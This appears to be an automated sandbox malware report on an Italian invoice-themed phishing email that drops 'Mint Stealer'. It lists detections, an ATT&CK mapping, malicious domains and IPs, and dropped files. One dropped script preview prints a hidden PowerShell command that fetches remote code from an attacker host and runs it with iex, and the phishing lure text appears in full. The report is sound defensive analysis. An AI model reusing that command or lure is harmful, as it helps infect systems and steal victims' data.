              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Yara detected Mint Stealer
              Source: Yara matchFile source: 00000013.00000002.1995057086.00000241A5DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1995057086.00000241A4917000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected Mint Stealer
              Source: Yara matchFile source: 00000013.00000002.1995057086.00000241A5DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1995057086.00000241A4917000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information112
              Scripting              		Valid Accounts2
              Windows Management Instrumentation              		1
              Browser Extensions              		11
              Process Injection              		11
              Masquerading              		OS Credential Dumping21
              Security Software Discovery              		Remote ServicesData from Local System2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		112
              Scripting              		1
              Registry Run Keys / Startup Folder              		1
              Modify Registry              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		1
              DLL Side-Loading              		1
              Extra Window Memory Injection              		11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Extra Window Memory Injection              		Cached Domain Credentials24
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://rigzuvzi3bnz3.top/1.php?s=mints130%Avira URL Cloudsafe
              http://danknlmmaahlimg.top/thovl94iuyhtr.php?id=user-PC&key=33431133382&s=mints130%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com
              		195.110.59.166
              		truetrue
                		unknown
                temp.sh
                		51.91.79.17
                		truefalse
                  		unknown
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		high
                    danknlmmaahlimg.top
                    		206.188.196.37
                    		truetrue
                      		unknown
                      www.google.com
                      		142.250.186.164
                      		truefalse
                        		high
                        rigzuvzi3bnz3.top
                        		168.100.9.29
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://rigzuvzi3bnz3.top/1.php?s=mints13true
                          • Avira URL Cloud: safe
                          		unknown
                          http://danknlmmaahlimg.top/thovl94iuyhtr.php?id=user-PC&key=33431133382&s=mints13true
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          52.113.194.132
                          		unknownUnited States
                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          142.250.185.78
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          1.1.1.1
                          		unknownAustralia
                          		13335CLOUDFLARENETUSfalse
                          206.188.196.37
                          		danknlmmaahlimg.topUnited States
                          		55002DEFENSE-NETUStrue
                          51.91.79.17
                          		temp.shFrance
                          		16276OVHFRfalse
                          52.109.89.18
                          		unknownUnited States
                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          52.111.236.34
                          		unknownUnited States
                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          195.110.59.166
                          		amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.comLithuania
                          		47583AS-HOSTINGERLTtrue
                          52.182.143.215
                          		unknownUnited States
                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          239.255.255.250
                          		unknownReserved
                          		unknownunknownfalse
                          2.19.126.151
                          		unknownEuropean Union
                          		16625AKAMAI-ASUSfalse
                          52.109.28.47
                          		unknownUnited States
                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                          142.250.186.164
                          		www.google.comUnited States
                          		15169GOOGLEUSfalse
                          142.250.186.131
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          64.233.184.84
                          		unknownUnited States
                          		15169GOOGLEUSfalse
                          184.28.90.27
                          		unknownUnited States
                          		16625AKAMAI-ASUSfalse
                          199.232.210.172
                          		bg.microsoft.map.fastly.netUnited States
                          		54113FASTLYUSfalse
                          168.100.9.29
                          		rigzuvzi3bnz3.topUnited States
                          		3700CLOUD9UStrue

                          Private

                          IP
                          192.168.2.18
                          127.0.0.1

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1557495
                          Start date and time:2024-11-18 10:44:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:26
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          Analysis Mode:stream
                          Analysis stop reason:Timeout
                          Sample name:I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winMSG@34/32@7/187
                          Cookbook Comments:
                          • Found application associated with file extension: .msg

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.109.89.18, 184.28.90.27, 52.109.28.47, 2.19.126.151, 2.19.126.160, 52.111.236.34, 52.111.236.35, 52.111.236.32, 52.111.236.33, 52.113.194.132, 199.232.210.172
                          • Excluded domains from analysis (whitelisted): omex.cdn.office.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, a1864.dscd.akamai.net, ecs.office.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, uks-azsc-000.roaming.officeapps.live.com, nleditor.osi.office.net, prod-eu-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, eur
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg

                          LLM Input / Output

                          InputOutput
                          URL: email Model: Joe Sandbox AI
                          {
    "explanation": [
        "Contains a suspicious external link to 'livecasinotipuk.com' which is not a legitimate business domain",
        "Uses urgency and threats of legal action to pressure recipient into clicking the link",
        "Claims to be about an unpaid invoice but provides no legitimate payment methods, only a suspicious link"
    ],
    "phishing": true,
    "confidence": 9
}
                          {
    "date": "Mon, 18 Nov 2024 10:41:46 +0100", 
    "subject": "I: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..", 
    "communications": [
        "SPAM ?\n\n \n\nDa: gianluca.mucciolo80@pec.it <gianluca.mucciolo80@pec.it> \nInviato: luned 18 novembre 2024 02:10\nA: Cuzziol beverage s.r.l. <cuzziolbeveragesrl@pec.it>\nOggetto: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..\n\n \n\nBuongiorno,\nCuzziol beverage s.r.l.\nCon sede in Santa lucia di piave(tv) Via Maiorana 1 \n\n05050740264\n\n \n\nCon la presente comunicazione, intendo attirare la Sua attenzione sul fatto che in virt del contratto stipulato il 10/05/2024, Lei ha assunto l'impegno di corrispondermi l'importo di euro 562,13. A tutt'oggi, non ho ancora ricevuto il pagamento nonostante i molteplici solleciti gi inviati.\nLa avviso che, se non provveder al pagamento spontaneamente entro cinque giorni dalla ricezione della presente, sar costretto/a ad affidare la pratica al mio avvocato per l'avvio delle procedure legali di recupero del credito, senza inviare ulteriori avvisi o solleciti. Si precisa che questa comunicazione costituisce una formale messa in mora e interrompe la prescrizione.\n\n\n \n\nE' possibile scaricare la fattura tramite il link sottostante: Fattura <https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L>   \n\nCordiali saluti,\n\n"
    ], 
    "from": "Franco Bin <franco.bin@cuzziol.it>", 
    "to": "Andrea Ceccherini <andrea.ceccherini@cuzziol.it>", 
    "attachements": []
}
                          URL: Email Model: Joe Sandbox AI
                          ```json
{
  "contains_trigger_text": true,
  "trigger_text": "Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": [
    "Da: gianluca.murcio030@pec.it <gianluca.murcio030@pec.it>",
    "Inviato: luned 18 novembre 2024 02:10",
    "A: Cuzziol beverage s.r.l. <cuzziolbeverage@pec.it>",
    "Oggetto: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l.",
    "Buongiorno, Cuzziol beverage s.r.l. Con sede in Santa lucia di pianeve(tv) Via Maiorana 1 05057/40264 Con la presente comunicazione, intendo attirare la Sua attenzione su fatto che in virt del contratto stipulato il 10/05/2024, Lei ha assunto l'impegno di corrispondermi l'importo di euro 562,15. A tutt'oggi non ho ancora ricevuto il pagamento nonostante i molteplici solleciti gi inviati. La avviso che, se non provveder al pagamento spontaneamente entro cinque giorni dalla ricezione della presente, sar costretto ad attivare la pratica al mio avvocato per l'avvio delle procedure legali di recupero del credito, senza ulteriori avvisi o solleciti. Si precisa che questa comunicazione costituisce una formale messa in mora e interrompe la prescrizione."
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false
}
                          URL: Email Model: Joe Sandbox AI
                          ```json
{
  "brands": [
    "Cuzziol beverage s.r.l."
  ]
}

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.3267872124816983
                          Encrypted:false
                          SSDEEP:
                          MD5:2B2237555C379C62A1483B671E0BCA1F
                          SHA1:1CE73D3A73DCFE20C69ACB1304BEABBC933A562B
                          SHA-256:6558483267581D689BD1961AFF85C5F8D390250C9A216BE6BF79FB6D0E0865DF
                          SHA-512:B9B57F210278296AD9B70B961A977DB10E87B5367F8E954DC170184988F7DFC0CE223BC0D4F9B84906511705573D9AE9B651A43D401C70C2718977856BDB4CA2
                          Malicious:false
                          Reputation:unknown
                          Preview:=...........@..@"....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................................-L......#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.08119845817648715
                          Encrypted:false
                          SSDEEP:
                          MD5:0CBAA17950919A0F6F2EFB541685D96B
                          SHA1:85ECFCBDA9B7CC049A256A7442C988A6FC30B3C9
                          SHA-256:4B16DF1AD9C958B841EBB1E17841AEC50B735187116D2C5977BDA15FEBA0EB50
                          SHA-512:178B9FDCA4FBDE98C8C48FFBA5CF20477D7B059F85BFFBD0919415DC6BAD27151032C40610A7E1F1C3B9D7EF03F873F03DF5C59CE36363E6BB24FBDEE4889087
                          Malicious:false
                          Reputation:unknown
                          Preview:...V.....................................;...{..#,...|.......{...............{.......{..:..O.....{.H..................L.#,...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\Public\Documents\ANwibhLHfyrt.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF, LF line terminators
                          Category:modified
                          Size (bytes):438
                          Entropy (8bit):3.5828660543288606
                          Encrypted:false
                          SSDEEP:
                          MD5:ECD24DE295E0FD7DAECFB64E6EFE3A0F
                          SHA1:B5AF2B4C7E384C146B1A1C40A13F8411BE3F5FA9
                          SHA-256:C6FABBCC4D97BE38E4569D1011EE1EA42136A15D7B1CE6BBAC07F6634CCBA4C0
                          SHA-512:6179F4621B75CF759B66EE8D0415B4D53141BCD47EA6E6B114FFF0511DFF0D2A47D0DDD936CC8A219E344188BE0958C6C8F3B38AAB0F715BC07F85057AEE482F
                          Malicious:true
                          Reputation:unknown
                          Preview:..p.o.w.e.r.s.h.e.l.l. .-.n.o.p.r.o.f.i.l.e. .-.e.x.e.c.u.t.i.o.n.p.o.l.i.c.y. .b.y.p.a.s.s. .-.W.i.n.d.o.w.S.t.y.l.e. .h.i.d.d.e.n. .-.c. .C.o.n.t.i.n.u.e. .=. .".C.o.n.t.i.n.u.e."...c.u.r.l. .-.u.s.e.b. .".h.t.t.p.:././.r.i.g.z.u.v.z.i.3.b.n.z.3...t.o.p./.1...p.h.p.?.s.=.m.i.n.t.s.1.3.". .|. .i.e.x.;...R.e.m.o.v.e.-.I.t.e.m. .".C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D.o.c.u.m.e.n.t.s.\.A.N.w.i.b.h.L.H.f.y.r.t...p.s.1.". .-.F.o.r.c.e. .....

                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):338
                          Entropy (8bit):3.4419296566325905
                          Encrypted:false
                          SSDEEP:
                          MD5:D6A6C1FF49BA08B0E622E8D4F9CA0C07
                          SHA1:4E290C6F8DF5D1692B5C8D8F2F0AACA015D3E087
                          SHA-256:8E95988A2AC84CCED17061DCA7BB1DA4CF5D4CB44410AFC1A29457B11ACD2B48
                          SHA-512:C03DE63ABEAB2C029B303AF180454B79E74FD4B55AF904B300D4FFF03A4611D95ADB43A85F4125FAD6946CD3E0033DF1B7D461535A6261C82BE667C6349B4591
                          Malicious:false
                          Reputation:unknown
                          Preview:p...... .........e.}.9..(...............................................9p,.VZ.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                          C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):231348
                          Entropy (8bit):4.389535555421031
                          Encrypted:false
                          SSDEEP:
                          MD5:5A3ACD8AD956A70BA6162F6B30766269
                          SHA1:8F577E86DB8615C593E4BA1A315432B5DE71FC97
                          SHA-256:3C869D3E3F7CBF8F675742BD8ED9D50C28C4DFD120D2A9FADA63E865330824DF
                          SHA-512:25E4D871B7CAF02AF12D02C435178B8DDA42884467BC680143827843E2E17826F0FCC3B18AD093841CDA19B9D3B994E447A7DE713AF41869BB5DE478756494B9
                          Malicious:false
                          Reputation:unknown
                          Preview:TH02...... ..=.q.9......SM01X...,......q.9..........IPM.Activity...........h...............h............H..h..g........H...h........0...H..h\nor ...ppDa...h.N..0...p.g....h../!...........h........_`.k...h./!@...I..w...h....H...8..k...0....T...............d.........2h...............k..............!h.............. h..J......g...#h....8.........$h0.......8....."h(Y.......Y....'h..............1h../!<.........0h....4....k../h....h......kH..hX...p.....g...-h .........g...+h../!......g................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B89B0D6D-78B5-4A78-874C-87C5A956B6BA

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):180335
                          Entropy (8bit):5.289247703746802
                          Encrypted:false
                          SSDEEP:
                          MD5:26603FB93257A44E1AF7423CDC623267
                          SHA1:2792CC6F5AFB4366A2C50B0786D9F9C20B0BF4BD
                          SHA-256:E4CC094454AA11499550CA6847785E0D1F84EA556FE33DCB0A9EE5F5F85B762C
                          SHA-512:62B2973F72588D55C612C938F6725E810DAAF76C4A04D77C5646B5DB74A8F46399A1ADA1B127E950CB5903C9482B0DBBC0904503D26C97207DB3EB732843A472
                          Malicious:false
                          Reputation:unknown
                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-11-18T09:44:38">.. Build: 16.0.18307.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):0.09216609452072291
                          Encrypted:false
                          SSDEEP:
                          MD5:F138A66469C10D5761C6CBB36F2163C3
                          SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                          SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                          SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):4616
                          Entropy (8bit):0.13760166725504608
                          Encrypted:false
                          SSDEEP:
                          MD5:2E9B814D0A19E8E114D9B0BE33A9704D
                          SHA1:988AB0D6247DB3AC28A1C51986CD4D73C9A11A47
                          SHA-256:FAF7C496801BC87A6D81401D4700BED312601A27BB71EB27824E3AD7DE390750
                          SHA-512:FCD52512E2097A56EC47776C8896F201B3052343922DCD9EE50806A34BC738065E07E6B0A2BA3A79AEFA11ECCB27C80BBB12B952958A9BC2EBDB325A1332E760
                          Malicious:false
                          Reputation:unknown
                          Preview:.... .c......,.`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):32768
                          Entropy (8bit):0.0446603401158491
                          Encrypted:false
                          SSDEEP:
                          MD5:33344E2615644406E88F9FC3E524BE3B
                          SHA1:38FCECE17B65C10BD0205DF189A96DD826F15789
                          SHA-256:CFB126B396800ABA5E92B6D15CCED9967CFD1010F8E6C4796F94FD96135F0191
